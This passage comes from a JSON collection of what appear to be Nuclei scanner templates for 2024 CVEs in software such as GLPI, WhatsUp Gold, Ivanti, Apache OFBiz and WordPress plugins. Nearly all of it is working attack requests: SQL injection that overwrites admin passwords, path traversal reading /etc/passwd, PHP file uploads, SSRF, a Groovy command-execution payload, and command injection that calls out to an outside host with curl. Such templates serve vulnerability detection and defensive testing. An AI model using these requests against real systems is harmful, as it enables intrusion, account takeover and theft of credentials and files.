\"text/html\")"],"condition":"and"}]}]},{"id":"CVE-2024-24131","info":{"name":"SuperWebMailer 9.31.0.01799 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/api/api.php/<script>alert(document.domain)</script>"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["<script>alert(document.domain)</script>","SuperWebMailerAPI"],"condition":"and"},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2024-1183","info":{"name":"Gradio - Server Side Request Forgery","severity":"medium"},"requests":[{"raw":["GET /file=http://oast.pro HTTP/1.1\nHost: {{Hostname}}\n"],"matchers":[{"type":"regex","regex":["(?m)^(?:Location\\s*?:\\s*?)(?:https?://|//)(?:[a-zA-Z0-9\\-_\\.@]*)oast\\.pro.*$"],"part":"header"}]}]},{"id":"CVE-2024-3097","info":{"name":"NextGEN Gallery <= 3.59 - Missing Authorization to Unauthenticated Information Disclosure","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/wp-json/ngg/v1/admin/block/image/1"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["\"success\":","\"image\":"],"condition":"and"},{"type":"word","part":"header","words":["application/json"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2024-29868","info":{"name":"Apache StreamPipes <= 0.93.0 - Use of Cryptographically Weak PRNG in Recovery Token Generation","severity":"critical"},"requests":[{"method":"GET","path":["{{BaseURL}}/streampipes-backend/api/v2/auth/settings"],"headers":{"User-Agent":"{{randstr}}"},"extractors":[{"type":"json","part":"body","name":"settings","group":1,"json":["if .allowPasswordRecovery==true and .allowSelfRegistration==true then true else false end"],"internal":true}]},{"method":"GET","path":["{{BaseURL}}/streampipes-backend/api/openapi.json"],"headers":{"User-Agent":"{{randstr}}"},"extractors":[{"type":"json","part":"body","name":"version","group":1,"json":[".info.version"],"internal":true}],"matchers":[{"type":"dsl","dsl":["contains(settings, true)","compare_versions(version, '>= 0.69.0') && compare_versions(version, '<= 0.93.0')"],"condition":"and"}]}]},{"id":"CVE-2024-6928","info":{"name":"Opti Marketing <= 2.0.9 - SQL Injection","severity":"high"},"requests":[{"raw":["GET / HTTP/1.1\nHost: {{Hostname}}\n"],"matchers":[{"type":"dsl","dsl":["contains(body, \"/wp-content/plugins/opti-marketing\")"],"condition":"and","internal":true}]},{"raw":["@timeout 20s\nPOST /wp-admin/admin-ajax.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\naction=save_article&postId=(select*from(select(sleep(6)))a)\n"],"matchers":[{"type":"dsl","dsl":["duration>=6","status_code == 200"],"condition":"and"}]}]},{"id":"CVE-2024-5084","info":{"name":"Hash Form <= 1.1.0 - Arbitrary File Upload","severity":"critical"},"requests":[{"raw":["GET / HTTP /1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n","POST /wp-admin/admin-ajax.php?action=hashform_file_upload_action&file_uploader_nonce={{nonce}}&allowedExtensions%5B0%5D=txt&sizeLimit=1048576&qqfile={{filename}}.txt HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\n{{md5(num)}}\n","GET /wp-content/uploads/hashform/temp/{{filename}}.txt HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n"],"matchers":[{"type":"dsl","dsl":["contains_all(body_2,\"success\",\"true\",\"url\") && status_code_2 == 200","contains(body_3,\"{{md5(num)}}\") && status_code_3 == 200"],"condition":"and"}],"extractors":[{"type":"regex","name":"nonce","part":"body","group":1,"regex":["\"ajax_nounce\":\"([0-9a-z]+)\",\"preview_img"],"internal":true}]}]},{"id":"CVE-2024-0200","info":{"name":"Github Enterprise Authenticated Remote Code Execution","severity":"critical"},"requests":[{"method":"GET","path":["{{BaseURL}}/api/v3/user/orgs"],"headers":{"Authorization":"Basic {{base64('{{username}}' + ':' + '{{password}}')}}"},"extractors":[{"type":"json","part":"body","name":"org_name","internal":true,"json":[".[].login"]}]},{"method":"GET","path":["{{BaseURL}}/api/v3/orgs/{{org_name}}/memberships/{{username}}"],"headers":{"Authorization":"Basic {{base64('{{username}}' + ':' + '{{password}}')}}"},"matchers-condition":"and","matchers":[{"type":"word","words":["\"role\": \"admin\""],"part":"body"}]},{"method":"POST","path":["{{BaseURL}}/api/v3/orgs/{{org_name}}/repos"],"headers":{"Content-Type":"application/json","Authorization":"Basic {{base64('{{username}}' + ':' + '{{password}}')}}"},"body":"{\n  \"name\": \"{{randstr}}\"\n}\n","matchers":[{"type":"status","status":[201]}]},{"method":"GET","cookie-reuse":true,"path":["{{BaseURL}}/login"],"extractors":[{"type":"regex","part":"body","internal":true,"group":1,"regex":["name=\"authenticity_token\" value=\"(.*?)\""],"name":"csrf_token"}]},{"method":"POST","path":["{{BaseURL}}/session"],"headers":{"Content-Type":"application/x-www-form-urlencoded"},"body":"login={{username}}&password={{password}}&commit=Sign%20in&authenticity_token={{csrf_token}}&\n","matchers":[{"type":"status","status":[302]},{"type":"word","words":["_gh_render"],"part":"header"}]},{"method":"GET","path":["{{BaseURL}}/organizations/{{org_name}}/settings/actions/repository_items?page=1&rid_key=nw_fsck"],"extractors":[{"type":"regex","group":1,"name":"ghe_secret","internal":true,"regex":["&quot;ENTERPRISE_SESSION_SECRET&quot;=&gt;&quot;([^\"]+?)&quot;"],"part":"body"}],"matchers":[{"type":"word","words":["ENTERPRISE_SESSION_SECRET"],"part":"body"}]},{"method":"GET","path":["{{BaseURL}}/"],"headers":{"Cookie":"_gh_render={{final_payoad}}"},"matchers-condition":"and","matchers":[{"type":"status","status":[500]},{"type":"word","part":"interactsh_protocol","words":["dns"]}]}]},{"id":"CVE-2024-21893","info":{"name":"Ivanti SAML - Server Side Request Forgery (SSRF)","severity":"high"},"requests":[{"raw":["POST /dana-ws/saml20.ws HTTP/1.1\nHost: {{Hostname}}\n\n<?xml version=\"1.0\" encoding=\"UTF-8\"?><soap:Envelope xmlns:soap=\"http://schemas.xmlsoap.org/soap/envelope/\">\t<soap:Body>\t\t<ds:Signature\t\txmlns:ds=\"http://www.w3.org/2000/09/xmldsig#\">\t\t\t<ds:SignedInfo>\t\t\t\t<ds:CanonicalizationMethod Algorithm=\"http://www.w3.org/2001/10/xml-exc-c14n#\"/>\t\t\t\t<ds:SignatureMethod Algorithm=\"http://www.w3.org/2000/09/xmldsig#rsa-sha1\"/>\t\t\t</ds:SignedInfo>\t\t\t<ds:SignatureValue>qwerty</ds:SignatureValue>\t\t\t<ds:KeyInfo xmlns:xsi=\"http://www.w3.org/2001/XMLSchema-instance\" xsi:schemaLocation=\"http://www.w3.org/2000/09/xmldsig\" xmlns:ds=\"http://www.w3.org/2000/09/xmldsig#\">\t\t\t\t<ds:RetrievalMethod URI=\"http://{{interactsh-url}}\"/>\t\t\t\t<ds:X509Data/>\t\t\t</ds:KeyInfo>\t\t\t<ds:Object></ds:Object>\t\t</ds:Signature>\t</soap:Body></soap:Envelope>\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"interactsh_protocol","words":["dns"]},{"type":"word","part":"body","words":["/dana-na/","WriteCSS"],"condition":"and"}]}]},{"id":"CVE-2024-24565","info":{"name":"CrateDB Database - Arbitrary File Read","severity":"medium"},"requests":[{"raw":["POST /_sql?types HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/json; charset=UTF-8\n\n{\"stmt\":\"CREATE TABLE {{table_name}}(info_leak STRING)\"}\n","POST /_sql?types HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/json; charset=UTF-8\n\n{\"stmt\":\"COPY {{table_name}} FROM '/etc/passwd' with (format='csv', header=false)\"}\n","POST /_sql?types HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/json; charset=UTF-8\n\n{\"stmt\":\"SELECT * FROM {{table_name}} limit 100\"}\n"],"matchers-condition":"and","matchers":[{"type":"dsl","dsl":["regex('root:.*:0:0:', body_3)","contains_all(header, 'application/json')","status_code_1 == 200 && status_code_2 == 200 && status_code_3 == 200"],"condition":"and"}]}]},{"id":"CVE-2024-6846","info":{"name":"SmartSearchWP <= 2.4.4 - Unauthenticated Log Purge","severity":"medium"},"requests":[{"raw":["POST /wp-json/wdgpt/v1/purge-error-logs HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/json\n\n{\"months\":\"1\"}\n"],"matchers":[{"type":"dsl","dsl":["contains_all(body,\"success\",\"true\", \"purged successfully\")","contains(content_type,\"application/json\")","status_code == 200"],"condition":"and"}]}]},{"id":"CVE-2024-1212","info":{"name":"Progress Kemp LoadMaster - Command Injection","severity":"critical"},"requests":[{"method":"GET","path":["{{BaseURL}}/access/set?param=enableapi&value=1"],"headers":{"Authorization":"Basic JztsczsnOmRvZXNub3RtYXR0ZXI="},"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["bin","mnt","WWW-Authenticate: Basic"],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2024-28995","info":{"name":"SolarWinds Serv-U - Directory Traversal","severity":"high"},"requests":[{"raw":["GET /?InternalDir=/../../../../windows&InternalFile=win.ini HTTP/1.1\nHost: {{Hostname}}\n","GET /?InternalDir=\\..\\..\\..\\..\\etc&InternalFile=passwd HTTP/1.1\nHost: {{Hostname}}\n"],"stop-at-first-match":true,"matchers-condition":"and","matchers":[{"type":"regex","part":"body","regex":["root:.*:0:0:","\\[(font|extension|file)s\\]"],"condition":"or"},{"type":"dsl","dsl":["contains(header, \"Serv-U\")","status_code == 200"],"condition":"and"}]}]},{"id":"CVE-2024-32399","info":{"name":"RaidenMAILD Mail Server v.4.9.4 - Path Traversal","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/webeditor/../../../windows/win.ini"],"matchers":[{"type":"dsl","dsl":["contains_all(body, \"[fonts]\", \"for 16-bit app support\")","contains(header, \"application/octet-stream\")","status_code == 200"],"condition":"and"}]}]},{"id":"CVE-2024-4885","info":{"name":"Progress Software WhatsUp Gold GetFileWithoutZip Directory Traversal - Remote Code Execution","severity":"critical"},"requests":[{"raw":["POST /NmAPI/RecurringReport HTTP/1.1\nHost: {{Hostname}}\nContent-Type: text/xml; charset=utf-8\nSOAPAction: http://tempuri.org/IRecurringReportServices/TestRecurringReport\n\n<s:Envelope xmlns:s=\"http://schemas.xmlsoap.org/soap/envelope/\"><s:Body><TestRecurringReport xmlns=\"http://tempuri.org/\"><rr xmlns:a=\"http://schemas.datacontract.org/2004/07/WUGDataAccess.RecurringReports.DataContracts\" xmlns:i=\"http://www.w3.org/2001/XMLSchema-instance\"><a:AlternateHost i:nil=\"true\"/><a:Disabled>false</a:Disabled><a:EmailSettings xmlns:b=\"http://schemas.datacontract.org/2004/07/WUGDataAccess.Core.DataContracts\"><b:Authentication>None</b:Authentication><b:CredentialsId i:nil=\"true\"/><b:DirectoryPath>C:\\PROGRA~2\\Ipswitch\\WhatsUp\\Data\\ScheduledReports</b:DirectoryPath><b:Password/><b:Port>25</b:Port><b:SMTPServer/><b:SendFrom>WhatsUpGold@YourDomain.com</b:SendFrom><b:SendTo i:nil=\"true\"/><b:Subject>Emailing: Wireless Log</b:Subject><b:TimeoutSec>5</b:TimeoutSec><b:UseEncryptedConn>false</b:UseEncryptedConn><b:Username/></a:EmailSettings><a:ExportOptions><a:AuthorName>WhatsUp Gold</a:AuthorName><a:AutosizePDFPage>true</a:AutosizePDFPage><a:AvoidImageBreak>false</a:AvoidImageBreak><a:AvoidTextBreak>true</a:AvoidTextBreak><a:BrowserPageHeight>0</a:BrowserPageHeight><a:BrowserPageWidth>0</a:BrowserPageWidth><a:ConversionDelay>3</a:ConversionDelay><a:CustomPageHeight>0</a:CustomPageHeight><a:CustomPageWidth>0</a:CustomPageWidth><a:ExportAuthToken/><a:ExportType>html</a:ExportType><a:FitHeight>false</a:FitHeight><a:FitWidth>false</a:FitWidth><a:InternalLinksEnabled>false</a:InternalLinksEnabled><a:LiveURLsEnabled>false</a:LiveURLsEnabled><a:NavigationTimeout>240</a:NavigationTimeout><a:PageOrientation>Portrait</a:PageOrientation><a:PageSize>Letter</a:PageSize><a:PdfMessage>html</a:PdfMessage><a:PreviewEnabled>false</a:PreviewEnabled><a:Subject i:nil=\"true\"/><a:TimeFormat>g:i:s a</a:TimeFormat><a:Title i:nil=\"true\"/><a:ToMail>true</a:ToMail><a:WebExportDirectory>C:\\\\Program Files (x86)\\\\Ipswitch\\\\WhatsUp\\\\html\\\\NmConsole\\\\</a:WebExportDirectory><a:ZipEnabled>false</a:ZipEnabled></a:ExportOptions><a:IncludeURLInEmail>false</a:IncludeURLInEmail><a:Name>2e441d4d5a4b258b</a:Name><a:NextRun i:nil=\"true\"/><a:RecurringReportID>-1</a:RecurringReportID><a:Schedule xmlns:b=\"http://schemas.datacontract.org/2004/07/WUGDataAccess.Core.DataContracts\"><b:DailyDays>1</b:DailyDays><b:DailyOptions>Interval</b:DailyOptions><b:DaysOfTheWeek xmlns:c=\"http://schemas.microsoft.com/2003/10/Serialization/Arrays\"><c:boolean>true</c:boolean><c:boolean>true</c:boolean><c:boolean>true</c:boolean><c:boolean>true</c:boolean><c:boolean>true</c:boolean><c:boolean>true</c:boolean><c:boolean>true</c:boolean></b:DaysOfTheWeek><b:MonthlyDayMonths>1</b:MonthlyDayMonths><b:MonthlyDayNumber>3</b:MonthlyDayNumber><b:MonthlyOptions>DayOfMonth</b:MonthlyOptions><b:MonthlyRecur>First</b:MonthlyRecur><b:MonthlyRecurDay>Sunday</b:MonthlyRecurDay><b:MonthlyRecurMonths>1</b:MonthlyRecurMonths><b:RecurringInterval>1</b:RecurringInterval><b:RecurringTimeIntervals>Minutes</b:RecurringTimeIntervals><b:ScheduleType>TimeInterval</b:ScheduleType><b:StartTime>2024-07-05T16:59:14.047957+01:00</b:StartTime><b:TimeIntervalStartDate>2024-07-05T16:59:14.047957+01:00</b:TimeIntervalStartDate><b:WeeklyWeeks>1</b:WeeklyWeeks><b:YearlyDayOfMonth>3</b:YearlyDayOfMonth><b:YearlyMonthRecur>First</b:YearlyMonthRecur><b:YearlyMonthRecurDay>Sunday</b:YearlyMonthRecurDay><b:YearlyMonths>March</b:YearlyMonths><b:YearlyOptions>DayOfYear</b:YearlyOptions><b:YearlyRecurMonth>March</b:YearlyRecurMonth></a:Schedule><a:URL>{\"title\":\"foo\",\"renderType\":\"aspx\",\"reports\":[{\"title\":\"thetitle\",\"url\":\"/NmConsole/api/Wireless/ReportWirelessLog\",\"dateRangeFilter\":{\"label\":\"Date Range\",\"n\":0,\"range\":\"Today\",\"text\":\"Today\"},\"severityFilter\":{\"label\":\"Severity\",\"value\":-1,\"text\":\"ALL\"},\"limit\":50,\"grid\":{\"emptyText\":\"[ No records found ]\",\"columns\":[{\"dataIndex\":\"Date\",\"text\":\"Date\",\"flex\":1},{\"dataIndex\":\"Severity\",\"text\":\"Severity\",\"flex\":1},{\"dataIndex\":\"Message\",\"text\":\"Message\",\"flex\":1}],\"filters\":[],\"sorters\":[]}}],\"baseUrl\":\"http://{{interactsh-url}}\",\"userId\":1}</a:URL><a:WebUserID>1</a:WebUserID><a:WebUserName>admin</a:WebUserName></rr></TestRecurringReport></s:Body></s:Envelope>\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"interactsh_protocol","words":["http"]},{"type":"word","part":"interactsh_request","words":["sPassword"]}]}]},{"id":"CVE-2024-34470","info":{"name":"HSC Mailinspector 5.2.17-3 through 5.2.18 - Local File Inclusion","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/mailinspector/login.php"],"host-redirects":true,"matchers":[{"type":"word","part":"body","words":["Licensed to HSC TREINAMENTO"]}]},{"method":"GET","path":["{{BaseURL}}/mailinspector/public/loader.php?path=../../../../../../../etc/passwd"],"matchers-condition":"and","matchers":[{"type":"regex","part":"body","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2024-27497","info":{"name":"Linksys E2000 1.0.06 position.js Improper Authentication","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/position.js"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["var session_key","close_session","HELPPATH"],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2024-6586","info":{"name":"Lightdash v0.1024.6 - Server-Side Request Forgery","severity":"high"},"requests":[{"raw":["POST /api/v1/login HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/json\n\n{\"email\":\"{{username}}\",\"password\":\"{{password}}\"}\n"]},{"raw":["GET /api/v1/org/projects HTTP/1.1\nHost: {{Hostname}}\n"],"extractors":[{"type":"json","name":"projectuuid","part":"body","json":[".results[0].projectUuid"],"internal":true}]},{"raw":["POST /api/v1/projects/{{projectuuid}}/dashboards HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/json\n\n{\"name\":\"Test\",\"description\":\"Test\",\"tiles\":[]}\n"],"extractors":[{"type":"json","name":"dashuuid","part":"body","json":[".results.uuid"],"internal":true}]},{"raw":["PATCH /api/v1/dashboards/{{dashuuid}} HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/json\n\n{\"tiles\":[{\"uuid\":\"00000000-0000-0000-0000-000000000000\",\"x\":0,\"y\":0,\"h\":9,\"w\":15,\"type\":\"markdown\",\"properties\":{\"title\":\"title\",\"hideTitle\":false,\"content\":\"<iframe src=\\\"http://{{interactsh-url}}\\\">frame</iframe>\\n\\n<img src=\\\"http://{{interactsh-url}}\\\">img</img>\\n\"}}],\"filters\":{\"dimensions\":[],\"metrics\":[],\"tableCalculations\":[]},\"name\":\"my dashboard\"}\n"],"matchers":[{"type":"word","part":"body","words":["\"status\":\"ok\""],"internal":true}]},{"raw":["POST /api/v1/dashboards/{{dashuuid}}/export HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/json\n\n{\"queryFilters\":\"\",\"gridWidth\":1400}\n"],"matchers":[{"type":"dsl","dsl":["contains(interactsh_protocol, \"http\")","contains(interactsh_request, \"connect.sid=\")","contains(body, \"status\\\":\\\"ok\")"],"condition":"and"}]}]},{"id":"CVE-2024-36104","info":{"name":"Apache OFBiz - Path Traversal","severity":"critical"},"requests":[{"raw":["POST /webtools/control/forgotPassword/%2e/%2e/ProgramExport HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\ngroovyProgram=\\u0074\\u0068\\u0072\\u006f\\u0077\\u0020\\u006e\\u0065\\u0077\\u0020\\u0045\\u0078\\u0063\\u0065\\u0070\\u0074\\u0069\\u006f\\u006e\\u0028\\u0027\\u0069\\u0064\\u0027\\u002e\\u0065\\u0078\\u0065\\u0063\\u0075\\u0074\\u0065\\u0028\\u0029\\u002e\\u0074\\u0065\\u0078\\u0074\\u0029\\u003b\n"],"matchers-condition":"and","matchers":[{"type":"regex","part":"body","regex":["uid=\\d+\\(([^)]+)\\) gid=\\d+\\(([^)]+)\\)"]},{"type":"word","part":"body","words":["java.lang.Exception"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2024-0352","info":{"name":"Likeshop < 2.5.7.20210311 - Arbitrary File Upload","severity":"critical"},"requests":[{"raw":["POST /api/file/formimage HTTP/1.1\nHost: {{Hostname}}\nContent-Type: multipart/form-data; boundary=----WebKitFormBoundarygcflwtei\nUser-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2226.0 Safari/537.36\n\n------WebKitFormBoundarygcflwtei\nContent-Disposition: form-data; name=\"file\";filename=\"{{filename}}.php\"\nContent-Type: application/x-php\n\n{{randstr}}\n------WebKitFormBoundarygcflwtei--\n"],"matchers":[{"type":"dsl","dsl":["status_code == 200","contains(body, \"\\\"name\\\":\\\"{{filename}}.php\\\"\")","contains_all(body, \"code\\\":1\", \"base_url\\\":\\\"uploads\\\\/user\")"],"condition":"and"}],"extractors":[{"type":"json","part":"body","json":[".data.url"]}]}]},{"id":"CVE-2024-38472","info":{"name":"Apache HTTPd Windows UNC - Server-Side Request Forgery","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/%5C%5C{{interactsh-url}}/apachehttpd"],"matchers-condition":"and","matchers":[{"type":"word","part":"interactsh_protocol","words":["dns"]},{"type":"word","part":"interactsh_request","words":["/apachehttpd"]}]}]},{"id":"CVE-2024-6670","info":{"name":"WhatsUp Gold HasErrors SQL Injection - Authentication Bypass","severity":"critical"},"requests":[{"raw":["POST /NmConsole/WugSystemAppSettings/JMXSecurity HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/json\n\n{\"KeyStorePassword\": \"{{password}}\", \"TrustStorePassword\": \"{{password}}\"}\n"],"matchers":[{"type":"dsl","dsl":["status_code == 302","contains(set_cookie, 'ASP.NET_SessionId=')"],"condition":"and","internal":true}]},{"raw":["POST /NmConsole/Platform/PerformanceMonitorErrors/HasErrors HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/json\n\n{\"deviceId\": \"22222\", \"classId\": \"DF215E10-8BD4-4401-B2DC-99BB03135F2E';UPDATE ProActiveAlert SET sAlertName='psyduck'+( SELECT sValue FROM GlobalSettings WHERE sName = '_GLOBAL_:JavaKeyStorePwd');--\", \"range\": \"1\", \"n\": \"1\", \"start\": \"3\", \"end\": \"4\", \"businesdsHoursId\": \"5\"}\n"],"matchers":[{"type":"dsl","dsl":["status_code == 200","contains(content_type, 'application/json')"],"condition":"and","internal":true}]},{"raw":["GET /NmConsole/Platform/Filter/AlertCenterItemsReportThresholds HTTP/1.1\nHost: {{Hostname}}\n"],"matchers":[{"type":"dsl","dsl":["status_code == 200","contains(body, 'DisplayName')"],"condition":"and","internal":true}],"extractors":[{"type":"regex","internal":true,"name":"encryptedPassword","regex":["\"psyduck\\d+(,\\d+)*\""]}]},{"raw":["POST /NmConsole/Platform/PerformanceMonitorErrors/HasErrors HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/json\n\n{\"deviceId\": \"22222\", \"classId\": \"DF215E10-8BD4-4401-B2DC-99BB03135F2E';UPDATE WebUser SET sPassword = {{encryptedPassword}} where sUserName = 'admin';--\", \"range\": \"1\", \"n\": \"1\", \"start\": \"3\", \"end\": \"4\", \"businesdsHoursId\": \"5\"}\n"],"matchers":[{"type":"dsl","dsl":["status_code == 200","contains(body, 'false')"],"condition":"and","internal":true}]},{"raw":["POST /NmConsole/User/LoginAjax HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nusername={{username}}&password={{password}}&rememberMe=false\n"],"matchers":[{"type":"word","part":"body","words":["\"authenticated\":true","\"username\":\""],"condition":"and"}],"extractors":[{"type":"dsl","dsl":["\"USER: \"+ username","\"PASS: \"+ password"]}]}]},{"id":"CVE-2024-0250","info":{"name":"Analytics Insights for Google Analytics 4 < 6.3 - Open Redirect","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/wp-content/plugins/analytics-insights/tools/oauth2callback.php?state=https://oast.me/%3f&code=x"],"matchers":[{"type":"regex","part":"header","regex":["(?m)^(?:Location\\s*?:\\s*?)(?:https?://|//)?(?:[a-zA-Z0-9\\-_\\.@]*)oast\\.me.*$"]}]}]},{"id":"CVE-2024-29889","info":{"name":"GLPI 10.0.10-10.0.14 - SQL Injection","severity":"high"},"requests":[{"raw":["GET /index.php?noAUTO=1 HTTP/1.1\nHost: {{Hostname}}\n"],"extractors":[{"type":"regex","name":"fieldlogin","part":"body","group":1,"regex":["id=\"login_name\" name=\"([a-z0-9]+)"],"internal":true},{"type":"regex","name":"csrf","part":"body","group":1,"regex":["name=\"_glpi_csrf_token\" value=\"([0-9a-z]+)"],"internal":true},{"type":"regex","name":"fieldpassword","part":"body","group":1,"regex":["id=\"login_password\" name=\"([0-9a-z]+)"],"internal":true}]},{"raw":["POST /front/login.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nnoAUTO=1&redirect=&_glpi_csrf_token={{csrf}}&{{fieldlogin}}={{username}}&{{fieldpassword}}={{password}}&auth=local&submit=\n"],"matchers":[{"type":"dsl","dsl":["status_code == 302","contains(location,'front/central.php')"],"condition":"and","internal":true}]},{"raw":["GET /ajax/common.tabs.php?_glpi_tab=User%241&main_class=tab_cadre_fixe&_target=%2Fglpi%2Ffront%2Fpreference.php&_itemtype=Preference&id=0 HTTP/1.1\nHost: {{Hostname}}\n"],"extractors":[{"type":"regex","name":"id","part":"body","group":1,"regex":["type='hidden' name='id' value='([0-9]+)'"],"internal":true}]},{"raw":["GET /front/preference.php HTTP/1.1\nHost: {{Hostname}}\n"],"extractors":[{"type":"regex","name":"csrf2","part":"body","group":1,"regex":["type=\"hidden\" name=\"_glpi_csrf_token\" value=\"(.*?)\""],"internal":true}]},{"raw":["POST /front/preference.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: multipart/form-data; boundary=----WebKitFormBoundaryRNyVHuSeiTMi2G7K\n\n------WebKitFormBoundaryRNyVHuSeiTMi2G7K\nContent-Disposition: form-data; name=\"savedsearches_pinned\"\n\n{\"exploit\":\"',api_token='{{randstr}}' where id={{id}};-- -\"}\n------WebKitFormBoundaryRNyVHuSeiTMi2G7K\nContent-Disposition: form-data; name=\"_glpi_csrf_token\"\n\n{{csrf2}}\n------WebKitFormBoundaryRNyVHuSeiTMi2G7K\nContent-Disposition: form-data; name=\"name\"\n\nglpi\n------WebKitFormBoundaryRNyVHuSeiTMi2G7K\nContent-Disposition: form-data; name=\"id\"\n\n{{id}}\n------WebKitFormBoundaryRNyVHuSeiTMi2G7K\nContent-Disposition: form-data; name=\"realname\"\n\n\n------WebKitFormBoundaryRNyVHuSeiTMi2G7K\nContent-Disposition: form-data; name=\"_uploader_picture[]\"; filename=\"\"\nContent-Type: application/octet-stream\n\n\n------WebKitFormBoundaryRNyVHuSeiTMi2G7K\nContent-Disposition: form-data; name=\"_blank_picture\"\n\n0\n------WebKitFormBoundaryRNyVHuSeiTMi2G7K\nContent-Disposition: form-data; name=\"firstname\"\n\n\n------WebKitFormBoundaryRNyVHuSeiTMi2G7K\nContent-Disposition: form-data; name=\"language\"\n\nen_US\n------WebKitFormBoundaryRNyVHuSeiTMi2G7K\nContent-Disposition: form-data; name=\"password\"\n\n\n------WebKitFormBoundaryRNyVHuSeiTMi2G7K\nContent-Disposition: form-data; name=\"password2\"\n\n\n------WebKitFormBoundaryRNyVHuSeiTMi2G7K\nContent-Disposition: form-data; name=\"phone\"\n\n\n------WebKitFormBoundaryRNyVHuSeiTMi2G7K\nContent-Disposition: form-data; name=\"_useremails[-1]\"\n\n\n------WebKitFormBoundaryRNyVHuSeiTMi2G7K\nContent-Disposition: form-data; name=\"mobile\"\n\n\n------WebKitFormBoundaryRNyVHuSeiTMi2G7K\nContent-Disposition: form-data; name=\"phone2\"\n\n\n------WebKitFormBoundaryRNyVHuSeiTMi2G7K\nContent-Disposition: form-data; name=\"registration_number\"\n\n\n------WebKitFormBoundaryRNyVHuSeiTMi2G7K\nContent-Disposition: form-data; name=\"locations_id\"\n\n0\n------WebKitFormBoundaryRNyVHuSeiTMi2G7K\nContent-Disposition: form-data; name=\"use_mode\"\n\n0\n------WebKitFormBoundaryRNyVHuSeiTMi2G7K\nContent-Disposition: form-data; name=\"_reset_api_token\"\n\n0\n------WebKitFormBoundaryRNyVHuSeiTMi2G7K\nContent-Disposition: form-data; name=\"update\"\n\nSave\n------WebKitFormBoundaryRNyVHuSeiTMi2G7K--\n"],"matchers":[{"type":"dsl","dsl":["status_code == 302"],"condition":"and","internal":true}]},{"raw":["GET /front/preference.php HTTP/1.1\nHost: {{Hostname}}\n"],"extractors":[{"type":"regex","name":"csrf3","part":"body","group":1,"regex":["type=\"hidden\" name=\"_glpi_csrf_token\" value=\"(.*?)\""],"internal":true}]},{"raw":["POST /ajax/pin_savedsearches.php HTTP/1.1\nHost: {{Hostname}}\nX-Glpi-Csrf-Token: {{csrf3}}\nX-Requested-With: XMLHttpRequest\nContent-Type: application/x-www-form-urlencoded; charset=UTF-8\n\nitemtype=Monitor\n"],"matchers":[{"type":"dsl","dsl":["status_code == 200","contains(body,\"\\\"success\\\":true\")"],"condition":"and","internal":true}]},{"raw":["GET /ajax/common.tabs.php?_glpi_tab=User%241&main_class=tab_cadre_fixe&_target=%2Fglpi%2Ffront%2Fpreference.php&_itemtype=Preference&id=0 HTTP/1.1\nHost: {{Hostname}}\n"],"matchers":[{"type":"dsl","dsl":["status_code == 200","contains(body,\"name=\\\"_api_token\\\" value=\\\"{{randstr}}\")"],"condition":"and"}]}]},{"id":"CVE-2024-27954","info":{"name":"WordPress Automatic Plugin <3.92.1 - Arbitrary File Download and SSRF","severity":"critical"},"requests":[{"method":"GET","path":["{{BaseURL}}/?p=3232&wp_automatic=download&link=file:///etc/passwd"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["\"link\":\"file:"]},{"type":"regex","regex":["root:.*:0:0:"]}]}]},{"id":"CVE-2024-21644","info":{"name":"pyLoad Flask Config - Access Control","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/render/info.html"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["&#39;SECRET_KEY&#39;:","&#39;pyload_session&#39;"],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2024-2389","info":{"name":"Progress Kemp Flowmon - Command Injection","severity":"critical"},"requests":[{"method":"GET","path":["{{BaseURL}}/service.pdfs/confluence?lang=en&file=`curl+{{interactsh-url}}`"],"matchers":[{"type":"dsl","dsl":["contains(interactsh_protocol, 'http')","contains(header, 'application/json') && contains(header, 'Flowmon')"],"condition":"and"}]}]},{"id":"CVE-2024-6746","info":{"name":"EasySpider 0.6.2 - Arbitrary File Read","severity":"medium"},"requests":[{"raw":["GET /taskGrid/tasklist.html 